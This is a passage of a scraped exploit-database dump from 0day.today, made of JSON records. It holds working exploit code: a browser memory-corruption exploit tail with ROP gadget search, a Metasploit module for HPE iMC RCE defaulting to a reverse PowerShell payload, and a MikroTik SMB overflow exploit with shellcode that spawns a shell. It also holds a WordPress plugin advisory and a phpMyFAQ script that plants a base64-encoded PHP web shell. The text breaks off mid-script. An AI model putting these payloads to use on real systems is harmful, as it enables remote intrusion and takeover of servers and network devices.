get_pe_header_offset(arr, js9_base) {\r\n var offset = read_dword_from_addr(arr, js9_base + 0x3c);\r\n return offset;\r\n}\r\n \r\nfunction get_import_table_offset(arr, js9_base) {\r\n var pe_header_offset = get_pe_header_offset(arr, js9_base);\r\n var pe_header = js9_base + pe_header_offset;\r\n var import_table_offset = read_dword_from_addr(arr, pe_header + 0x80);\r\n return import_table_offset;\r\n}\r\n \r\nfunction get_import_table_size(arr, js9_base) {\r\n var pe_header_offset = get_pe_header_offset(arr, js9_base);\r\n var pe_header = js9_base + pe_header_offset;\r\n var import_table_size = read_dword_from_addr(arr, pe_header + 0x84);\r\n return import_table_size;\r\n}\r\n \r\nfunction get_vp_addr(arr, js9_base) {\r\n var kernel32_entry = get_kernel32_entry(arr, js9_base);\r\n var string_pointers_offset = read_dword_from_addr(arr, kernel32_entry - 0xc);\r\n var function_pointers_offset = read_dword_from_addr(arr, kernel32_entry + 0x4);\r\n var func_name = new String();\r\n for (fptr = js9_base + function_pointers_offset, sptr = js9_base + string_pointers_offset; fptr != 0 && sptr != 0; fptr += 4, sptr += 4) {\r\n func_name = read_string_from_addr(arr, js9_base + read_dword_from_addr(arr, sptr) +2);\r\n if (func_name.indexOf(\"VirtualProtect\") > -1) {\r\n return read_dword_from_addr(arr, fptr);\r\n }\r\n }\r\n return 0;\r\n}\r\n \r\nfunction get_kernel32_entry(arr, js9_base) {\r\n var it_addr = js9_base + get_import_table_offset(arr, js9_base);\r\n var it_size = get_import_table_size(arr, js9_base);\r\n var s = new String();\r\n for (var next_addr = it_addr + 0xc; next_addr < js9_base + it_addr + it_size; next_addr += 0x14) {\r\n var it_entry = read_dword_from_addr(arr, next_addr);\r\n if (it_entry != 0) {\r\n s = read_string_from_addr(arr, js9_base + it_entry);\r\n if (s.indexOf(\"KERNEL32\") > -1 || s.indexOf(\"kernel32\") > -1) {\r\n return next_addr;\r\n }\r\n }\r\n }\r\n return 0;\r\n}\r\n \r\nfunction read_dword_from_addr(arr, addr) {\r\n return arr[get_index_from_addr(addr)];\r\n}\r\n \r\nfunction read_byte_from_addr(arr, addr) {\r\n var mod = addr % 4;\r\n var ui32 = read_dword_from_addr(arr, addr);\r\n return ((ui32 >> (mod * 8)) & 0x000000ff);\r\n \r\n}\r\n \r\nfunction read_string_from_addr(arr, addr) {\r\n var s = new String();\r\n var i = 0;\r\n for (i = addr, c = \"stub\"; c != String.fromCharCode(0); i++) {\r\n c = String.fromCharCode(read_byte_from_addr(arr, i));\r\n s += c;\r\n }\r\n return s;\r\n}\r\n \r\nfunction write_dword_to_addr(arr, addr, data) {\r\n arr[get_index_from_addr(addr)] = data;\r\n}\r\n \r\nfunction find_gadget_offset(arr, js9_base, offsets, gadget, gadget_key) {\r\n var first_dword = 0x0, second_dword = 0x0, g = 0;\r\n var gadget_candidate = [];\r\n for (g = 0; g < offsets.length; g++) {\r\n first_dword = read_dword_from_addr(arr, js9_base + offsets[g]);\r\n second_dword = read_dword_from_addr(arr, js9_base + offsets[g] + 4);\r\n \r\n gadget_candidate = convert_reverse_ui32_to_array(first_dword);\r\n gadget_candidate = gadget_candidate.concat(convert_reverse_ui32_to_array(second_dword));\r\n \r\n if (contains_gadget(gadget_candidate, gadget)) {\r\n gadget_offsets[gadget_key] = offsets[g];\r\n break;\r\n }\r\n }\r\n}\r\n \r\nfunction construct_gadget_dict(arr, js9_base) {\r\n find_gadget_offset(arr, js9_base, first_gadget_offsets, first_gadget, \"g1\");\r\n find_gadget_offset(arr, js9_base, stackpivot_gadget_offsets, stackpivot_gadget, \"stackpivot\");\r\n if (gadget_offsets[\"stackpivot\"] > 0) {\r\n gadget_offsets[\"g2\"] = gadget_offsets[\"stackpivot\"] + 1;\r\n }\r\n}\r\n \r\nfunction contains_gadget(arr, sub) {\r\n var i = 0;\r\n for (i = 0; i < sub.length; i++) {\r\n if (arr.indexOf(sub[i]) == -1) return false;\r\n }\r\n return true;\r\n}\r\n \r\nfunction convert_reverse_ui32_to_array(ui32) {\r\n var arr = [];\r\n var i = 0;\r\n var tmp = ui32;\r\n for (i = 0; i < 4; i++, tmp = tmp >> 8) {\r\n arr.push(tmp & 0x000000ff);\r\n }\r\n return arr;\r\n}\r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-05-24] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30433"}, {"lastseen": "2018-05-18T18:37:27", "references": [], "description": "Exploit for windows platform in category remote exploits", "edition": 1, "reporter": "TrendyTofu", "published": "2018-05-18T00:00:00", "title": "HPE iMC 7.3 - Remote Code Execution Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-05-18T18:37:27", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8982", "CVE-2017-12500"], "modified": "2018-05-18T00:00:00", "id": "1337DAY-ID-30371", "href": "https://0day.today/exploit/description/30371", "sourceData": "# Exploit Title: HPE iMC EL Injection Unauthenticated RCE\r\n# Date: 6 February, 2018\r\n# Exploit Author: TrendyTofu\r\n# Vendor Homepage: https://www.hpe.com/us/en/home.html\r\n# Software Link: http://h10145.www1.hpe.com/Downloads/SoftwareReleases.aspx?ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535\r\n# Version: prior to 7.3 E0504P04\r\n# Tested on: iMC PLAT v7.3 (E0504P02), Windows Server 2012R2 x64 (EN)\r\n# CVE : CVE-2017-8982, CVE-2017-12500\r\n# Reference:\r\nhttps://www.thezdi.com/blog/2018/2/6/one-mans-patch-is-another-mans-treasure-a-tale-of-a-failed-hpe-patch\r\n \r\nMetasploit module also hosted on Github. Posted below for reference:\r\nhttps://raw.githubusercontent.com/thezdi/scripts/master/msf/hp_imc_el_injection_rce.rb\r\n \r\n \r\n##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'HPE iMC EL Injection Unauthenticated RCE',\r\n 'Description' => %q{\r\n This module exploits an expression language injection\r\nvulnerablity, along with\r\n an authentication bypass vulnerability in Hewlett Packard\r\nEnterprise Intelligent\r\n Management Center before version 7.3 E0504P04 to achieve\r\nremote code execution.\r\n \r\n The HP iMC server suffers from multiple vulnerabilities allows\r\nunauthenticated\r\n attacker to execute arbitrary Expression Language via the\r\nbeanName parameter,\r\n allowing execution of arbitrary operating system commands as\r\nSYSTEM. This service\r\n listens on TCP port 8080 and 8443 by default.\r\n \r\n This module has been tested successfully on iMC PLAT v7.3\r\n(E0504P02) on Windows\r\n 2k12r2 x64 (EN).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'mr_me', # Discovery\r\n 'trendytofu' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2017-8982'],\r\n ['ZDI', '18-139'],\r\n ['URL',\r\n'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03809en_us'],\r\n ['CVE', '2017-12500'],\r\n ['ZDI', '17-663'],\r\n ['URL',\r\n'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03768en_us']\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' => [\r\n [ 'Windows',\r\n {\r\n 'Arch' => [ ARCH_CMD],\r\n 'Platform' => 'win'\r\n }\r\n ]\r\n ],\r\n 'Privileged' => true,\r\n 'DisclosureDate' => 'Jan 25 2018',\r\n 'DefaultOptions' =>\r\n {\r\n 'Payload' => 'cmd/windows/reverse_powershell'\r\n },\r\n 'DefaultTarget' => 0))\r\n register_options [Opt::RPORT(8080)]\r\n end\r\n \r\n def check\r\n res = send_request_raw({'uri' => '/imc/login.jsf' })\r\n \r\n return CheckCode::Detected if res && res.code == 200\r\n \r\n CheckCode::Unknown\r\n end\r\n \r\n def get_payload(cmd)\r\n %q|facesContext.getExternalContext().redirect(%22%22.getClass().forName(%22javax.script.ScriptEngineManager%22).newInstance().getEngineByName(%22JavaScript%22).eval(%22var%20proc=new%20java.lang.ProcessBuilder[%5C%22(java.lang.String[])%5C%22]([%5C%22cmd.exe%5C%22,%5C%22/c%5C%22,%5C%22|+cmd+%q|%5C%22]).start();%22))|\r\n end\r\n \r\n def execute_command(payload)\r\n res = send_request_raw({ 'uri' =>\r\n\"/imc/primepush/%2e%2e/ict/export/ictExpertDownload.xhtml?beanName=#{payload}\"\r\n})\r\n fail_with(Msf::Module::Failure::UnexpectedReply, \"Injection\r\nfailed\") if res && res.code != 302\r\n print_good \"Command injected successfully!\"\r\n end\r\n \r\n def exploit\r\n cmd = payload.encoded\r\n cmd.gsub!('cmd.exe /c ','')\r\n cmd = Rex::Text.uri_encode(cmd)\r\n \r\n print_status \"Sending payload...\"\r\n execute_command get_payload cmd\r\n end\r\nend\n\n# 0day.today [2018-05-18] #", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30371"}, {"lastseen": "2018-03-20T01:19:38", "references": [], "description": "Exploit for hardware platform in category remote exploits", "edition": 1, "reporter": "CoreLabs", "published": "2018-03-16T00:00:00", "title": "MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow Exploit", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7445"], "modified": "2018-03-16T00:00:00", "href": "https://0day.today/exploit/description/29995", "id": "1337DAY-ID-29995", "sourceData": "#!/usr/bin/env python\r\n \r\nimport socket\r\nimport struct\r\nimport sys\r\nimport telnetlib\r\n \r\nNETBIOS_SESSION_MESSAGE = \"\\x00\"\r\nNETBIOS_SESSION_REQUEST = \"\\x81\"\r\nNETBIOS_SESSION_FLAGS = \"\\x00\"\r\n \r\n# trick from http://shell-storm.org/shellcode/files/shellcode-881.php\r\n# will place the socket file descriptor in eax\r\nfind_sock_fd = \"\\x6a\\x02\\x5b\\x6a\\x29\\x58\\xcd\\x80\\x48\"\r\n \r\n# dup stdin-stdout-stderr so we can reuse the existing connection\r\ndup_fds = \"\\x89\\xc3\\xb1\\x02\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\"\r\n \r\n# execve - cannot pass the 2nd arg as NULL or busybox will complain\r\nexecve_bin_sh = \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"\r\n \r\n# build shellcode\r\nshellcode = find_sock_fd + dup_fds + execve_bin_sh\r\n \r\n# rop to mprotect and make the heap executable\r\n# the heap base is not being subject to ASLR for whatever reason, so let's take advantage of it\r\np = lambda x : struct.pack('I', x)\r\n \r\nrop = \"\"\r\nrop += p(0x0804c39d) # 0x0804c39d: pop ebx; pop ebp; ret; \r\nrop += p(0x08072000) # ebx -> heap base\r\nrop += p(0xffffffff) # ebp -> gibberish\r\nrop += p(0x080664f5) # 0x080664f5: pop ecx; adc al, 0xf7; ret; \r\nrop += p(0x14000) # ecx -> size for mprotect\r\nrop += p(0x08066f24) # 0x08066f24: pop edx; pop edi; pop ebp; ret; \r\nrop += p(0x00000007) # edx -> permissions for mprotect -> PROT_READ | PROT_WRITE | PROT_EXEC\r\nrop += p(0xffffffff) # edi -> gibberish\r\nrop += p(0xffffffff) # ebp -> gibberish\r\nrop += p(0x0804e30f) # 0x0804e30f: pop ebp; ret; \r\nrop += p(0x0000007d) # ebp -> mprotect system call\r\nrop += p(0x0804f94a) # 0x0804f94a: xchg eax, ebp; ret; \r\nrop += p(0xffffe42e) # 0xffffe42e; int 0x80; pop ebp; pop edx; pop ecx; ret - from vdso - not affected by ASLR\r\nrop += p(0xffffffff) # ebp -> gibberish\r\nrop += p(0x0) # edx -> zeroed out\r\nrop += p(0x0) # ecx -> zeroed out\r\nrop += p(0x0804e30f) # 0x0804e30f: pop ebp; ret; \r\nrop += p(0x08075802) # ebp -> somewhere on the heap that will (always?) contain user controlled data\r\nrop += p(0x0804f94a) # 0x0804f94a: xchg eax, ebp; ret;\r\nrop += p(0x0804e153) # jmp eax; - jump to our shellcode on the heap\r\n \r\noffset_to_regs = 83\r\n \r\n# we do not really care about the initial register values other than overwriting the saved ret address\r\nebx = p(0x45454545)\r\nesi = p(0x45454545)\r\nedi = p(0x45454545)\r\nebp = p(0x45454545)\r\neip = p(0x0804886c) # 0x0804886c: ret;\r\n \r\npayload = \"\\xff\" * offset_to_regs + ebx + esi + edi + ebp + eip + rop\r\nheader = struct.pack(\"!ccH\", NETBIOS_SESSION_REQUEST, NETBIOS_SESSION_FLAGS, len(payload))\r\nbuf = header + payload\r\n \r\ndef open_connection(ip):\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((ip, 139))\r\n return s\r\n \r\ndef store_payload(s):\r\n print \"[+] storing payload on the heap\"\r\n s.send((NETBIOS_SESSION_MESSAGE + \"\\x00\\xeb\\x02\") * 4000 + \"\\x90\" * 16 + shellcode)\r\n \r\ndef crash_smb(s):\r\n print \"[+] getting code execution\"\r\n s.send(buf)\r\n \r\nif __name__ == \"__main__\":\r\n if len(sys.argv) != 2:\r\n print \"%s ip\" % sys.argv[0]\r\n sys.exit(1)\r\n \r\n s = open_connection(sys.argv[1])\r\n store_payload(s)\r\n \r\n # the server closes the first connection, so we need to open another one\r\n t = telnetlib.Telnet()\r\n t.sock = open_connection(sys.argv[1])\r\n crash_smb(t.sock)\r\n print \"[+] got shell?\"\r\n t.interact()\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29995"}, {"lastseen": "2018-01-03T19:12:22", "references": [], "description": "WordPress Booking Calendar plugin versions 7.1, 7.0, and below suffer from remote SQL injection and local file inclusion vulnerabilities.", "edition": 1, "reporter": "Neven Biruski", "published": "2017-12-20T00:00:00", "type": "zdt", "title": "WordPress Booking Calendar 7.0 / 7.1 SQL Injection / Local File Inclusion Vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-12-20T00:00:00", "href": "https://0day.today/exploit/description/29275", "id": "1337DAY-ID-29275", "sourceData": "Advisory Title: WordPress Booking Calendar Plugin Multiple Vulnerabilities\r\nAdvisory URL: http://www.defensecode.com/advisories.php\r\nSoftware: WordPress Booking Calendar plugin\r\nLanguage: PHP\r\nVersion: 7.0/7.1 and below\r\nVendor Status: Vendor contacted, updates released\r\nRelease Date: 2017/12/13\r\nRisk: Medium\r\n\r\n\r\n\r\n1. General Overview\r\n===================\r\nDuring the security audit of Booking Calendar plugin for WordPress\r\nCMS, multiple vulnerabilities were discovered using DefenseCode\r\nThunderScan application source code security analysis platform.\r\n\r\nMore information about ThunderScan is available at URL:\r\nhttp://www.defensecode.com\r\n\r\n\r\n2. Software Overview\r\n====================\r\nBooking Calendar plugin - described by the authors as the ultimate\r\nbooking system for online reservation and availability checking\r\nservice for your site.\r\n\r\nAccording to wordpress.org, it has more than 40,000 active installs.\r\n\r\nHomepage:\r\nhttps://wordpress.org/plugins/booking/\r\nhttp://wpbookingcalendar.com/\r\nhttps://wordpress.org/plugins/booking/#developers\r\n\r\n\r\n3. Vulnerability Description\r\n============================\r\nDuring the security analysis, ThunderScan discovered SQL injection and\r\nLocal file inclusion vulnerabilities in Booking Calendar WordPress\r\nplugin.\r\n\r\nThe easiest way to reproduce the SQL injection vulnerabilities is to\r\nsend the specified parameter to the provided URL while being logged in\r\nas administrator or another user that is authorized to access the\r\nplugin settings page. Users that do not have full administrative\r\nprivileges could abuse the database access the vulnerabilities provide\r\nto either escalate their privileges or obtain and modify database\r\ncontents they were not supposed to be able to.\r\n\r\nBy requesting a specially crafted URL, the attacker can cause remote\r\nserver to execute a php file of his choosing. Although the user\r\nrequesting the URL has to be logged into the WordPress administrative\r\nconsole, the attacker can cause the administrator to request such a\r\nURL by using various social engineering/phishing approaches. Specified\r\nfile will be interpreted by php interpreter, and any valid php code\r\nwill indeed be executed. If the php installation on server has\r\n\"allow_url_include=1\" configuration option set, this attack can be\r\nexpanded to execute a php file from any remote URL. If the php version\r\nis less than 5.3.4, the \".php\" that gets appended to the end of the\r\nfile name attacker chose can be omitted by adding a null character\r\n(\"%00\") to the requested URL, and enable the attacker to execute any\r\nfile, regardless of the extension.\r\n\r\nDue to the CSRF token needed to perform the attack the risk is lowered\r\nto medium.\r\n\r\n3.1. SQL injection\r\n Function: $wpdb->query()\r\n Variable: $_POST[ \"booking_id\" ];\r\n Vulnerable URL: /wp-admin/admin-ajax.php\r\n File: booking\\lib\\wpbc-ajax.php\r\n ---------\r\n 152 $booking_id = $_POST[ \"booking_id\" ];\r\n 153 $approved_id = explode('|',$booking_id);\r\n ...\r\n 162 $approved_id_str = join( ',', $approved_id);\r\n ...\r\n 165 if ( false === $wpdb->query( $wpdb->prepare( \"UPDATE\r\n{$wpdb->prefix}bookingdates SET approved = %s WHERE booking_id IN\r\n({$approved_id_str})\", $is_approve_or_pending ) ) ){ \r\n ---------\r\n \r\n3.2. SQL injection\r\n Function: $wpdb->query()\r\n Variable: $_POST[ \"booking_id\" ];\r\n Vulnerable URL: /wp-admin/admin-ajax.php\r\n Vulnerable code snippets:\r\n File: booking\\lib\\wpbc-ajax.php\r\n ---------\r\n 110 $id_of_new_bookings = $_POST[ \"booking_id\" ];\r\n 111 $arrayof_bookings_id = explode('|',$id_of_new_bookings);\r\n ...\r\n 114 wpbc_update_number_new_bookings( $arrayof_bookings_id,\r\n$is_new , $user_id );\r\n ---------\r\n File: booking\\lib\\wpdev-booking-functions.php\r\n ---------\r\n 1468 function wpbc_update_number_new_bookings(\r\n$id_of_new_bookings, $is_new = '0' , $user_id = 1 ){\r\n ...\r\n 1485 $update_sql = \"UPDATE {$wpdb->prefix}booking AS bk SET\r\nbk.is_new = {$is_new} WHERE bk.booking_id IN ( {$id_of_new_bookings} ) \";\r\n ...\r\n 1487 if ( false === $wpdb->query( $update_sql ) ) {\r\n ---------\r\n\r\n3.3 PHP file inclusion\r\n Function: include()\r\n Variable: $_POST['captcha_chalange']\r\n Vulnerable URL: /wp-admin/admin-ajax.php\r\n Vulnerable code snippets:\r\n File: booking\\core\\lib\\wpbc-booking-new.php\r\n ---------\r\n 127 if (! wpbc_check_CAPTCHA( $_POST['captcha_user_input'],\r\n$_POST['captcha_chalange'], $bktype ) ) {\r\n ...\r\n 19 function wpbc_check_CAPTCHA( $the_answer_from_respondent,\r\n$prefix, $bktype ) {\r\n ...\r\n 23 $correct = $captcha_instance->check($prefix,\r\n$the_answer_from_respondent);\r\n ---------\r\n File: wp-content\\plugins\\booking\\js\\captcha\\captcha.php\r\n ---------\r\n 139 function check( $prefix, $response ) {\r\n ...\r\n 141 include( $this->tmp_dir . $prefix . '.php' );\r\n ---------\r\n \r\n\r\n4. Solution\r\n===========\r\nVendor resolved the security issues. All users are strongly advised to\r\nupdate WordPress Booking Calendar plugin to the latest available\r\nversion.\r\n\r\n\r\n5. Credits\r\n==========\r\nDiscovered by Neven Biruski using DefenseCode ThunderScan source code\r\nsecurity analyzer.\r\n\r\n \r\n6. Disclosure Timeline\r\n======================\r\n2016/11/15 Vulnerabilities discovered\r\n2017/04/04 Vendor contacted\r\n2017/04/04 Vendor responded - 7.0 already fixed SQL injection vulns\r\n2017/04/04 Update released for LFI (7.1)\r\n2017/12/13 Advisory released to the public\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/29275", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-10T05:11:37", "references": [], "description": "phpMyFAQ version 2.9.9 suffers from an issue where an administrative account can execute arbitrary code on the server by modifying LANG_CONF[main.metaDescription].", "edition": 1, "reporter": "tomplixsee", "published": "2017-11-19T00:00:00", "type": "zdt", "title": "phpMyFAQ 2.9.9 Code Injection Exploit", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-11-19T00:00:00", "href": "https://0day.today/exploit/description/29018", "id": "1337DAY-ID-29018", "sourceData": "# Exploit Title: [PHPMYFAQ 2.9.9 Code Injection]\r\n# Google Dork: [NA]\r\n# Date: [Nov 6 2017]\r\n# Exploit Author: [tomplixsee]\r\n# Author blog : [cupuzone.wordpress.com]\r\n# Vendor Homepage: [ http://www.phpmyfaq.de]\r\n# Software Link: [http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip]\r\n# Version: [2.9.9] \r\n# Tested on: [Ubuntu Server 16.04, PHP 7.0.22]\r\n# CVE : [NA]\r\n\r\n\r\nHow to reproduce\r\n1. login to administrative page (example http://vbox-ubuntu-server.me/phpmyfaq/admin/ ) as an admin or any user with right access to edit translation\r\n2. open page configuration->interface translation (assume you use english language). fyi, edit translations only active if folder phpmyfaq/lang is writable, so make sure the folder is writable\r\n3. choose indonesia (or another language) to edit\r\n4. choose page 14 (in example)\r\n5. choose variable LANG_CONF[main.metaDescription]\r\n6. set phpinfo() as value\r\n7. change your languge to indonesia\r\n\r\n\r\nvulnerable code\r\non file admin/ajax.trans.php\r\n\r\n 43 case 'save_page_buffer':\r\n 44 /*\r\n 45 * Build language variable definitions\r\n 46 * @todo Change input handling using PMF_Filter\r\n 47 */\r\n 48 foreach ((array) @$_POST['PMF_LANG'] as $key => $val) {\r\n 49 if (is_string($val)) {\r\n 50 $val = str_replace(array('\\\\\\\\', '\\\"', '\\\\\\''), array('\\\\', '\"', \"'\"), $val);\r\n 51 $val = str_replace(\"'\", \"\\\\'\", $val);\r\n 52 $_SESSION['trans']['rightVarsOnly'][\"PMF_LANG[$key]\"] = $val;\r\n 53 } elseif (is_array($val)) {\r\n 54 /*\r\n 55 * Here we deal with a two dimensional array\r\n 56 */\r\n 57 foreach ($val as $key2 => $val2) {\r\n 58 $val2 = str_replace(array('\\\\\\\\', '\\\"', '\\\\\\''), array('\\\\', '\"', \"'\"), $val2);\r\n 59 $val2 = str_replace(\"'\", \"\\\\'\", $val2);\r\n 60 $_SESSION['trans']['rightVarsOnly'][\"PMF_LANG[$key][$key2]\"] = $val2;\r\n 61 }\r\n 62 }\r\n 63 }\r\n 64 \r\n 65 foreach ((array) @$_POST['LANG_CONF'] as $key => $val) {\r\n 66 // if string like array(blah-blah-blah), extract the contents inside the brackets\r\n 67 if (preg_match('/^\\s*array\\s*\\(\\s*(\\d+.+)\\s*\\).*$/', $val, $matches1)) {\r\n 68 // split the resulting string of delimiters such as \"number =>\"\r\n 69 $valArr = preg_split(\r\n 70 '/\\s*(\\d+)\\s*\\=\\>\\s*/',\r\n 71 $matches1[1],\r\n 72 null,\r\n 73 PREG_SPLIT_DELIM_CAPTURE | PREG_SPLIT_NO_EMPTY\r\n 74 );\r\n 75 $numVal = count($valArr);\r\n 76 if ($numVal > 1) {\r\n 77 $newValArr = [];\r\n 78 for ($i = 0; $i < $numVal; $i += 2) {\r\n 79 if (is_numeric($valArr[$i])) {\r\n 80 // clearing quotes\r\n 81 if (preg_match('/^\\s*\\\\\\\\*[\\\"|\\'](.+)\\\\\\\\*[\\\"|\\'][\\s\\,]*$/', $valArr[$i + 1], $matches2)) {\r\n 82 $subVal = $matches2[1];\r\n 83 // normalize quotes\r\n 84 $subVal = str_replace(array('\\\\\\\\', '\\\"', '\\\\\\''), array('\\\\', '\"', \"'\"), $subVal);\r\n 85 $subVal = str_replace(\"'\", \"\\\\'\", $subVal);\r\n 86 // assembly of the original substring back\r\n 87 $newValArr[] = $valArr[$i].' => \\''.$subVal.'\\'';\r\n 88 }\r\n 89 }\r\n 90 }\r\n 91 $_SESSION['trans']['rightVarsOnly'][\"LANG_CONF[$key]\"] = 'array('.implode(', ', $newValArr).')';\r\n 92 }\r\n 93 } else { // compatibility for old behavior\r\n 94 $val = str_replace(array('\\\\\\\\', '\\\"', '\\\\\\''), array('\\\\', '\"', \"'\"), $val);\r\n 95 $val = str_replace(\"'\", \"\\\\'\", $val);\r\n 96 $_SESSION['trans']['rightVarsOnly'][\"LANG_CONF[$key]\"] = $val;\r\n 97 }\r\n 98 }\r\n 99 \r\n 100 echo 1;\r\n 101 break;\r\n 102 \r\n 103 case 'save_translated_lang':\r\n 104 \r\n 105 if (!$user->perm->checkRight($user->getUserId(), 'edittranslation')) {\r\n 106 echo $PMF_LANG['err_NotAuth'];\r\n 107 exit;\r\n 108 }\r\n 109 \r\n 110 $lang = strtolower($_SESSION['trans']['rightVarsOnly']['PMF_LANG[metaLanguage]']);\r\n 111 $filename = PMF_ROOT_DIR.'/lang/language_'.$lang.'.php';\r\n 112 \r\n 113 if (!is_writable(PMF_ROOT_DIR.'/lang')) {\r\n 114 echo 0;\r\n 115 exit;\r\n 116 }\r\n 117 \r\n 118 if (!copy($filename, PMF_ROOT_DIR.'/lang/language_'.$lang.'.bak.php')) {\r\n 119 echo 0;\r\n 120 exit;\r\n 121 }\r\n 122 \r\n 123 $newFileContents = '';\r\n 124 $tmpLines = [];\r\n 125 \r\n 126 // Read in the head of the file we're writing to\r\n 127 $fh = fopen($filename, 'r');\r\n 128 do {\r\n 129 $line = fgets($fh);\r\n 130 array_push($tmpLines, rtrim($line));\r\n 131 } while ('*/' != substr(trim($line), -2));\r\n 132 fclose($fh);\r\n 133 \r\n 134 // Construct lines with variable definitions\r\n 135 foreach ($_SESSION['trans']['rightVarsOnly'] as $key => $val) {\r\n 136 if (0 === strpos($key, 'PMF_LANG')) {\r\n 137 $val = \"'$val'\";\r\n 138 }\r\n 139 array_push($tmpLines, '$'.str_replace(array('[', ']'), array(\"['\", \"']\"), $key).\" = $val;\");\r\n 140 }\r\n 141 \r\n 142 $newFileContents .= implode(\"\\n\", $tmpLines);\r\n 143 \r\n 144 unset($_SESSION['trans']);\r\n 145 \r\n 146 $retval = file_put_contents($filename, $newFileContents);\r\n 147 echo intval($retval);\r\n 148 break;\r\n\r\n\r\n\r\n\r\nthe exploit\r\n-----------------------------------------------------------------\r\n\r\n\r\n#! /usr/bin/python\r\nimport sys, requests, argparse, readline\r\n \r\ndef main(argv):\r\n global url, user, password\r\n parser = argparse.ArgumentParser(description='PHPMYFAQ 2.9.9 Code Injection exploitation tool. author : tomplixsee')\r\n parser.add_argument('-u','--url', help='target url',required=True)\r\n parser.add_argument('-p','--password', help='password',required=True)\r\n parser.add_argument('-s','--user', help='user',required=True)\r\n args = parser.parse_args()\r\n \r\n url = args.url\r\n user = args.user\r\n password = args.password\r\n\r\nif __name__ == \"__main__\":\r\n main(sys.argv[1:])\r\n\r\n#get the cookie\r\ndef login():\r\n global url, user, password,cookie\r\n print \"\\033[1;33m>>>>>> logging in\\033[1;m\"\r\n data = {\"faqusername\":user,\"faqpassword\":password}\r\n headers = {\r\n }\r\n r = requests.post(url+\"/admin/index.php\", headers=headers, data=data)\r\n if \"dashboard\" in r.text:\r\n print \"\\033[1;32m>>>>>> login sucessful\\033[1;m\"\r\n cookie = r.cookies[\"PHPSESSID\"]\r\n check()\r\n else:\r\n print \"login failed\"\r\n sys.exit()\r\n\r\n#check if user has access to edit translations. \r\n#get the crsf token \r\ndef check():\r\n global url,cookie, csrf\r\n print \"\\033[1;33m>>>>>> check user auth\\033[1;m\"\r\n headers = {\r\n 'Accept': '*/*',\r\n \"Cookie\":\"PHPSESSID=\"+cookie\r\n }\r\n r = requests.get(url+\"/admin/index.php?action=transedit&translang=id\", headers=headers)\r\n if (\"You are not authorized.\" not in r.text) or (\"ajaxaction=save_translated_lang&csrf\" in r.text):\r\n print \"\\033[1;32m>>>>>> authorized\\033[1;m\"\r\n else:\r\n print \"not authorized\"\r\n sys.exit()\r\n #get csrf token\r\n str_csrf = r.text.split(\"action=ajax&ajax=trans&ajaxaction=save_translated_lang&csrf=\" )\r\n csrf = str_csrf[1][0:40]\r\n savebuffer()\r\n\r\n#save payload to session\r\ndef savebuffer():\r\n global url,cookie, csrf\r\n print \"\\033[1;33m>>>>>> trying to fill the buffer\\033[1;m\"\r\n headers = {\r\n 'Accept': '*/*',\r\n \"Cookie\":\"PHPSESSID=\"+cookie\r\n }\r\n data = {\r\n \"LANG_CONF[main.metaDescription]\":'eval(base64_decode(\\\"c3lzdGVtKCRfUkVRVUVTVFtxXSk7IGlmKGlzc2V0KCRfUkVRVUVTVFttYXRpXSkpZGllOw==\\\"))'\r\n }\r\n r = requests.post(url+\"/admin/index.php?action=ajax&ajax=trans&ajaxaction=save_page_buffer&csrf=\"+csrf, headers=headers, data=data)\r\n if r.text==\"1\":\r\n print \"\\033[1;32m>>>>>> success\\033[1;m\"\r\n write2file()\r\n else:\r\n sys.exit()\r\n \r\n#write payload to file\r\ndef write2file():\r\n global url,cookie, csrf\r\n print \"\\033[1;33m>>>>>> write payload to server\\033[1;m\"\r\n headers = {\r\n 'Accept': '*/*',\r\n \"Cookie\":\"PHPSESSID=\"+cookie\r\n }\r\n data = {}\r\n r = requests.post(url+\"/admin/index.php?action=ajax&ajax=trans&ajaxaction=save_translated_lang&csrf=\"+csrf, headers=headers, data=data)\r\n if r.text!=\"\":\r\n print \"\\033[1;32m>>>>>> success\\033[1;m\"\r\n print \"\\033[1;32m>>>>>> enjoy your shell\\033[1;m\"\r\n exploit('')\r\n else:\r\n sys.exit()\r\n\r\n#send system command\r\ndef exploit(command):\r\n global 